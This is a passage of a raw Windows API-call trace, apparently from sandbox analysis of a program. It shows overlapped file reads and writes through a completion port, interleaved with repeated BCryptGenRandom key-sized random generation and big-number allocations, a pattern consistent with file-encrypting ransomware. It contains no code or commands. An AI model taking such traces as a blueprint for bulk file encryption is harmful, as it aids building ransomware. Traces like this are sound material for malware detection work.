lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3586, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0150.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0150.312] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.312] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.312] free (_Block=0x3e305b8) [0150.312] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.312] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.313] free (_Block=0x1fa91d0) [0150.313] free (_Block=0x1fa2ed8) [0150.313] free (_Block=0x1fa90b8) [0150.313] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.328] CloseHandle (hObject=0xec) returned 1 [0150.328] free (_Block=0x3ef0008) [0150.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.328] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1650, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.329] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.367] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x6690, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.367] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.376] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x5cae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.387] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.434] CloseHandle (hObject=0xec) returned 1 [0150.434] free (_Block=0x3e70008) [0150.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.440] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x6630, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.453] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x3cd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.464] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xd6c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.482] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xa3b2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0150.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.763] CloseHandle (hObject=0x3cc) returned 1 [0150.763] free (_Block=0x1ff1e60) [0150.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.765] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.773] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0150.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.774] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0150.774] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.774] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.774] free (_Block=0x3e305b8) [0150.774] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.774] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.774] free (_Block=0x1fa91d0) [0150.774] free (_Block=0x1fa2ed8) [0150.775] free (_Block=0x1fa90b8) [0150.775] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0150.775] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.790] CloseHandle (hObject=0x308) returned 1 [0150.790] free (_Block=0x3df0008) [0150.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.806] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1c0c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.827] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0151.948] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xa0b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0151.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0151.957] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0151.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0151.959] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0151.959] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0151.959] free (_Block=0x3e305b8) [0151.959] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0151.959] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0151.959] free (_Block=0x1fa91d0) [0151.959] free (_Block=0x1fa2ed8) [0151.959] free (_Block=0x1fa90b8) [0151.959] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0151.959] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0151.969] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x4f10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0151.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0151.981] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x366e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0151.994] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.008] ReadFile (in: hFile=0x2a4, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0xf36, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0152.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.022] CloseHandle (hObject=0x2a4) returned 1 [0152.022] free (_Block=0x3fb00b8) [0152.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.028] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xa510, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.031] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x180e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0152.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.219] CloseHandle (hObject=0x308) returned 1 [0152.219] free (_Block=0x3df0008) [0152.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.220] CloseHandle (hObject=0x170) returned 1 [0152.221] free (_Block=0x1ff1e60) [0152.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0152.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0152.237] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.237] free (_Block=0x3e305b8) [0152.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.237] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.238] free (_Block=0x1fa91d0) [0152.238] free (_Block=0x1fa2ed8) [0152.238] free (_Block=0x1fa90b8) [0152.238] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0152.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.239] CloseHandle (hObject=0x338) returned 1 [0152.239] free (_Block=0x3d70450) [0152.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0152.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.260] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0152.260] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.260] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.260] free (_Block=0x3e305b8) [0152.260] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.260] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.261] free (_Block=0x1fa91d0) [0152.261] free (_Block=0x1fa2ed8) [0152.261] free (_Block=0x1fa90b8) [0152.261] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.270] CloseHandle (hObject=0x3cc) returned 1 [0152.270] free (_Block=0x3e70008) [0152.270] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.278] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f50, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.293] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x81ce, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0152.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.295] CloseHandle (hObject=0x3cc) returned 1 [0152.295] free (_Block=0x3d70450) [0152.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.608] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0152.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0152.609] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.609] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.610] free (_Block=0x3e305b8) [0152.610] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.610] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.610] free (_Block=0x1fa91d0) [0152.610] free (_Block=0x1fa2ed8) [0152.610] free (_Block=0x1fa90b8) [0152.610] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0152.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.612] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2450, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0152.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.646] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x45a2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0152.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.665] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xa783, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.699] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0152.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0152.700] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.700] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.701] free (_Block=0x3e305b8) [0152.701] calloc (_Count=0x41, _Size=0x4) returned 